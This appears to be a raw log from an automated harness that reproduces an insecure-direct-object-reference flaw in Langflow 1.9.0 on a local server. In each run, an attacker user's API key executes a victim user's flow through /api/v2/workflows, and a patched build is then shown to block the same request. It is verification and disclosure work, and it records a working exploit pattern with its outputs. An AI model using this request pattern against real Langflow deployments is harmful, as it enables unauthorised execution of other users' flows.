[2026-07-07T21:47:32+00:00] uv: uv 0.11.27 (x86_64-unknown-linux-gnu) [2026-07-07T21:47:32+00:00] Extracting vulnerable source f52d0f0072 -> /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln [2026-07-07T21:47:38+00:00] installed: langflow 1.9.0 langflow-base 0.9.0 [2026-07-07T21:47:43+00:00] installed flow.py: /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln/src/backend/base/langflow/helpers/flow.py [2026-07-07T21:47:57+00:00] uv: uv 0.11.27 (x86_64-unknown-linux-gnu) [2026-07-07T21:47:57+00:00] Extracting vulnerable source f52d0f0072 -> /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln [2026-07-07T21:48:03+00:00] installed: langflow 1.9.0 langflow-base 0.9.0 [2026-07-07T21:48:08+00:00] installed flow.py: /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln/src/backend/base/langflow/helpers/flow.py [2026-07-07T21:48:13+00:00] flow.py ownership-check marker (expect VULN for phase 1): VULN [2026-07-07T21:48:13+00:00] Starting Langflow server (vulnerable) on 127.0.0.1:7861 (developer_api=true) ... [2026-07-07T21:48:13+00:00] langflow server pid=190874 (phase=vulnerable) [2026-07-07T21:48:22+00:00] Langflow server (vulnerable) is up (health OK) [2026-07-07T21:48:22+00:00] Registering victim user via POST /api/v1/users/ ... [2026-07-07T21:48:22+00:00] victim register: {"id":"f71af05a-922b-4470-8119-aac624e5fdc6","username":"victim_v","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-07T21:48:22.340820","updated_at" [2026-07-07T21:48:22+00:00] Registering attacker user via POST /api/v1/users/ ... [2026-07-07T21:48:22+00:00] attacker register: {"id":"74efd065-fe76-4571-9765-6245ee02b9d5","username":"attacker_v","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-07T21:48:22.525774","updated_a [2026-07-07T21:48:24+00:00] logins OK (victim token len=187, attacker token len=187) [2026-07-07T21:48:24+00:00] API keys created (victim=sk-wg5achf..., attacker=sk-tbNuaxh...) [2026-07-07T21:48:25+00:00] Victim flow created: VICTIM_FLOW_ID=a9b324b5-459b-4125-995f-47deb0d7623c [2026-07-07T21:48:25+00:00] Resolved ChatInput node id: ChatInput-3OQi9 [2026-07-07T21:48:25+00:00] Ownership proof: victim GET -> 200 (expect 200), attacker GET -> 404 (expect 404) [2026-07-07T21:48:25+00:00] VARIANT payload inputs: {"ChatInput-3OQi9.input_value":"IDOR_VARIANT_PROBE_V2WF_1783460905"} [2026-07-07T21:48:25+00:00] VULNERABLE /api/v2/workflows (attacker x-api-key, flow_id=victim flow): {"flow_id":"a9b324b5-459b-4125-995f-47deb0d7623c","job_id":"2ae4e56c-358e-45be-b691-f8afa82ebbe0","object":"response","created_timestamp":"2026-07-07T21:48:25.590303+00:00","status":"completed","errors":[],"inputs":{"ChatInput-3OQi9.input_value":"IDOR_VARIANT_PROBE_V2WF_1783460905"},"outputs":{"ChatOutput-J6aor":{"type":"message","status":"completed","content":"IDOR_VARIANT_PROBE_V2WF_1783460905", [2026-07-07T21:49:20+00:00] uv: uv 0.11.27 (x86_64-unknown-linux-gnu) [2026-07-07T21:49:20+00:00] Extracting vulnerable source f52d0f0072 -> /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln [2026-07-07T21:49:26+00:00] installed: langflow 1.9.0 langflow-base 0.9.0 [2026-07-07T21:49:31+00:00] installed flow.py: /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln/src/backend/base/langflow/helpers/flow.py [2026-07-07T21:49:36+00:00] flow.py ownership-check marker (expect VULN for phase 1): VULN [2026-07-07T21:49:36+00:00] Starting Langflow server (vulnerable) on 127.0.0.1:7861 (developer_api=true) ... [2026-07-07T21:49:36+00:00] langflow server pid=191493 (phase=vulnerable) [2026-07-07T21:49:45+00:00] Langflow server (vulnerable) is up (health OK) [2026-07-07T21:49:45+00:00] Registering victim user via POST /api/v1/users/ ... [2026-07-07T21:49:45+00:00] victim register: {"id":"26c4d276-67ef-426b-b438-c9097bc209f0","username":"victim_v","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-07T21:49:45.237912","updated_at" [2026-07-07T21:49:45+00:00] Registering attacker user via POST /api/v1/users/ ... [2026-07-07T21:49:45+00:00] attacker register: {"id":"1efe9c9d-0bbe-4045-ab73-0bbf4dc043be","username":"attacker_v","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-07T21:49:45.423015","updated_a [2026-07-07T21:49:47+00:00] logins OK (victim token len=187, attacker token len=187) [2026-07-07T21:49:47+00:00] API keys created (victim=sk-yufoV1c..., attacker=sk-pk1MUbd...) [2026-07-07T21:49:47+00:00] Victim flow created: VICTIM_FLOW_ID=1065f900-2dad-4ca7-ad7a-82b92f572f91 [2026-07-07T21:49:47+00:00] Resolved ChatInput node id: ChatInput-3OQi9 [2026-07-07T21:49:47+00:00] Ownership proof: victim GET -> 200 (expect 200), attacker GET -> 404 (expect 404) [2026-07-07T21:49:47+00:00] VARIANT payload inputs: {"ChatInput-3OQi9.input_value":"IDOR_VARIANT_PROBE_V2WF_1783460987"} [2026-07-07T21:49:48+00:00] VULNERABLE /api/v2/workflows (attacker x-api-key, flow_id=victim flow): {"flow_id":"1065f900-2dad-4ca7-ad7a-82b92f572f91","job_id":"3c559b8f-9ff4-4b85-ab16-85bb3312bc05","object":"response","created_timestamp":"2026-07-07T21:49:48.528815+00:00","status":"completed","errors":[],"inputs":{"ChatInput-3OQi9.input_value":"IDOR_VARIANT_PROBE_V2WF_1783460987"},"outputs":{"ChatOutput-J6aor":{"type":"message","status":"completed","content":"IDOR_VARIANT_PROBE_V2WF_1783460987", [2026-07-07T21:49:48+00:00] VULNERABLE variant IDOR classification: true [2026-07-07T21:49:56+00:00] flow.py ownership-check marker (expect FIXED for phase 2): FIXED [2026-07-07T21:49:56+00:00] Starting Langflow server (fixed) on 127.0.0.1:7861 (developer_api=true) ... [2026-07-07T21:49:56+00:00] langflow server pid=191794 (phase=fixed) [2026-07-07T21:50:05+00:00] Langflow server (fixed) is up (health OK) [2026-07-07T21:50:06+00:00] fixed-phase attacker key=sk-EeF3ize... [2026-07-07T21:50:06+00:00] FIXED /api/v2/workflows (attacker x-api-key, flow_id=victim flow): http=404 body={"detail":{"error":"Flow not found","code":"FLOW_NOT_FOUND","message":"Flow '1065f900-2dad-4ca7-ad7a-82b92f572f91' does not exist. Verify the flow_id and try again.","flow_id":"1065f900-2dad-4ca7-ad7a-82b92f572f91"}} [2026-07-07T21:50:06+00:00] FIXED variant blocked classification: true [2026-07-07T21:50:08+00:00] Restored vulnerable flow.py in place (cache state preserved for repro). [2026-07-07T21:50:08+00:00] SUMMARY: variant_reproduced_on_vulnerable=true variant_blocked_on_fixed=true [2026-07-07T21:50:08+00:00] This is an ALTERNATE TRIGGER (same root cause, different endpoint), NOT a bypass. [2026-07-07T21:50:15+00:00] uv: uv 0.11.27 (x86_64-unknown-linux-gnu) [2026-07-07T21:50:15+00:00] Extracting vulnerable source f52d0f0072 -> /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln [2026-07-07T21:50:21+00:00] installed: langflow 1.9.0 langflow-base 0.9.0 [2026-07-07T21:50:26+00:00] installed flow.py: /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln/src/backend/base/langflow/helpers/flow.py [2026-07-07T21:50:31+00:00] flow.py ownership-check marker (expect VULN for phase 1): VULN [2026-07-07T21:50:31+00:00] Starting Langflow server (vulnerable) on 127.0.0.1:7861 (developer_api=true) ... [2026-07-07T21:50:31+00:00] langflow server pid=192284 (phase=vulnerable) [2026-07-07T21:50:40+00:00] Langflow server (vulnerable) is up (health OK) [2026-07-07T21:50:40+00:00] Registering victim user via POST /api/v1/users/ ... [2026-07-07T21:50:40+00:00] victim register: {"id":"17c2408e-59e5-48e1-9012-93ccb3f66dc4","username":"victim_v","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-07T21:50:40.653085","updated_at" [2026-07-07T21:50:40+00:00] Registering attacker user via POST /api/v1/users/ ... [2026-07-07T21:50:41+00:00] attacker register: {"id":"fae023a9-b6f2-424d-b5e9-c715c11e9c07","username":"attacker_v","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-07T21:50:40.836184","updated_a [2026-07-07T21:50:43+00:00] logins OK (victim token len=187, attacker token len=187) [2026-07-07T21:50:43+00:00] API keys created (victim=sk-dmpPkqA..., attacker=sk-po9evzb...) [2026-07-07T21:50:43+00:00] Victim flow created: VICTIM_FLOW_ID=a9afd3f9-229b-4c65-830f-b145f263ea9b [2026-07-07T21:50:43+00:00] Resolved ChatInput node id: ChatInput-3OQi9 [2026-07-07T21:50:43+00:00] Ownership proof: victim GET -> 200 (expect 200), attacker GET -> 404 (expect 404) [2026-07-07T21:50:43+00:00] VARIANT payload inputs: {"ChatInput-3OQi9.input_value":"IDOR_VARIANT_PROBE_V2WF_1783461043"} [2026-07-07T21:50:43+00:00] VULNERABLE /api/v2/workflows (attacker x-api-key, flow_id=victim flow): {"flow_id":"a9afd3f9-229b-4c65-830f-b145f263ea9b","job_id":"b66dfe58-8eae-460a-aef5-77a4adabc385","object":"response","created_timestamp":"2026-07-07T21:50:43.935473+00:00","status":"completed","errors":[],"inputs":{"ChatInput-3OQi9.input_value":"IDOR_VARIANT_PROBE_V2WF_1783461043"},"outputs":{"ChatOutput-J6aor":{"type":"message","status":"completed","content":"IDOR_VARIANT_PROBE_V2WF_1783461043", [2026-07-07T21:50:43+00:00] VULNERABLE variant IDOR classification: true [2026-07-07T21:50:52+00:00] flow.py ownership-check marker (expect FIXED for phase 2): FIXED [2026-07-07T21:50:52+00:00] Starting Langflow server (fixed) on 127.0.0.1:7861 (developer_api=true) ... [2026-07-07T21:50:52+00:00] langflow server pid=192585 (phase=fixed) [2026-07-07T21:50:59+00:00] Langflow server (fixed) is up (health OK) [2026-07-07T21:51:01+00:00] fixed-phase attacker key=sk-iRyh1_l... [2026-07-07T21:51:01+00:00] FIXED /api/v2/workflows (attacker x-api-key, flow_id=victim flow): http=404 body={"detail":{"error":"Flow not found","code":"FLOW_NOT_FOUND","message":"Flow 'a9afd3f9-229b-4c65-830f-b145f263ea9b' does not exist. Verify the flow_id and try again.","flow_id":"a9afd3f9-229b-4c65-830f-b145f263ea9b"}} [2026-07-07T21:51:01+00:00] FIXED variant blocked classification: true [2026-07-07T21:51:03+00:00] Restored vulnerable flow.py in place (cache state preserved for repro). [2026-07-07T21:51:03+00:00] SUMMARY: variant_reproduced_on_vulnerable=true variant_blocked_on_fixed=true [2026-07-07T21:51:03+00:00] This is an ALTERNATE TRIGGER (same root cause, different endpoint), NOT a bypass. [2026-07-07T21:51:07+00:00] uv: uv 0.11.27 (x86_64-unknown-linux-gnu) [2026-07-07T21:51:07+00:00] Extracting vulnerable source f52d0f0072 -> /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln [2026-07-07T21:51:13+00:00] installed: langflow 1.9.0 langflow-base 0.9.0 [2026-07-07T21:51:18+00:00] installed flow.py: /data/pruva/project-cache/688af86e-dc4c-4d20-bb02-ccdf8da2c7d0/lf-src-vuln/src/backend/base/langflow/helpers/flow.py [2026-07-07T21:51:23+00:00] flow.py ownership-check marker (expect VULN for phase 1): VULN [2026-07-07T21:51:23+00:00] Starting Langflow server (vulnerable) on 127.0.0.1:7861 (developer_api=true) ... [2026-07-07T21:51:23+00:00] langflow server pid=193062 (phase=vulnerable) [2026-07-07T21:51:32+00:00] Langflow server (vulnerable) is up (health OK) [2026-07-07T21:51:32+00:00] Registering victim user via POST /api/v1/users/ ... [2026-07-07T21:51:32+00:00] victim register: {"id":"5de06ba9-31b4-48c9-86c0-b4abb319712c","username":"victim_v","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-07T21:51:32.043040","updated_at" [2026-07-07T21:51:32+00:00] Registering attacker user via POST /api/v1/users/ ... [2026-07-07T21:51:32+00:00] attacker register: {"id":"14e978e9-fe01-42b3-93d2-24172c7d99c3","username":"attacker_v","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-07T21:51:32.228410","updated_a [2026-07-07T21:51:34+00:00] logins OK (victim token len=187, attacker token len=187) [2026-07-07T21:51:34+00:00] API keys created (victim=sk-SLEcmFi..., attacker=sk-Un3jNg9...) [2026-07-07T21:51:34+00:00] Victim flow created: VICTIM_FLOW_ID=79ea0fe5-a5e9-4647-a299-62792d36f4f1 [2026-07-07T21:51:34+00:00] Resolved ChatInput node id: ChatInput-3OQi9 [2026-07-07T21:51:34+00:00] Ownership proof: victim GET -> 200 (expect 200), attacker GET -> 404 (expect 404) [2026-07-07T21:51:34+00:00] VARIANT payload inputs: {"ChatInput-3OQi9.input_value":"IDOR_VARIANT_PROBE_V2WF_1783461094"} [2026-07-07T21:51:34+00:00] VULNERABLE /api/v2/workflows (attacker x-api-key, flow_id=victim flow): {"flow_id":"79ea0fe5-a5e9-4647-a299-62792d36f4f1","job_id":"e3f2cc08-2a2d-404c-a2a9-6b4ca245058c","object":"response","created_timestamp":"2026-07-07T21:51:34.826699+00:00","status":"completed","errors":[],"inputs":{"ChatInput-3OQi9.input_value":"IDOR_VARIANT_PROBE_V2WF_1783461094"},"outputs":{"ChatOutput-J6aor":{"type":"message","status":"completed","content":"IDOR_VARIANT_PROBE_V2WF_1783461094", [2026-07-07T21:51:34+00:00] VULNERABLE variant IDOR classification: true [2026-07-07T21:51:42+00:00] flow.py ownership-check marker (expect FIXED for phase 2): FIXED [2026-07-07T21:51:42+00:00] Starting Langflow server (fixed) on 127.0.0.1:7861 (developer_api=true) ... [2026-07-07T21:51:42+00:00] langflow server pid=193369 (phase=fixed) [2026-07-07T21:51:50+00:00] Langflow server (fixed) is up (health OK) [2026-07-07T21:51:52+00:00] fixed-phase attacker key=sk-WGC6C8U... [2026-07-07T21:51:52+00:00] FIXED /api/v2/workflows (attacker x-api-key, flow_id=victim flow): http=404 body={"detail":{"error":"Flow not found","code":"FLOW_NOT_FOUND","message":"Flow '79ea0fe5-a5e9-4647-a299-62792d36f4f1' does not exist. Verify the flow_id and try again.","flow_id":"79ea0fe5-a5e9-4647-a299-62792d36f4f1"}} [2026-07-07T21:51:52+00:00] FIXED variant blocked classification: true [2026-07-07T21:51:54+00:00] Restored vulnerable flow.py in place (cache state preserved for repro). [2026-07-07T21:51:54+00:00] SUMMARY: variant_reproduced_on_vulnerable=true variant_blocked_on_fixed=true [2026-07-07T21:51:54+00:00] This is an ALTERNATE TRIGGER (same root cause, different endpoint), NOT a bypass.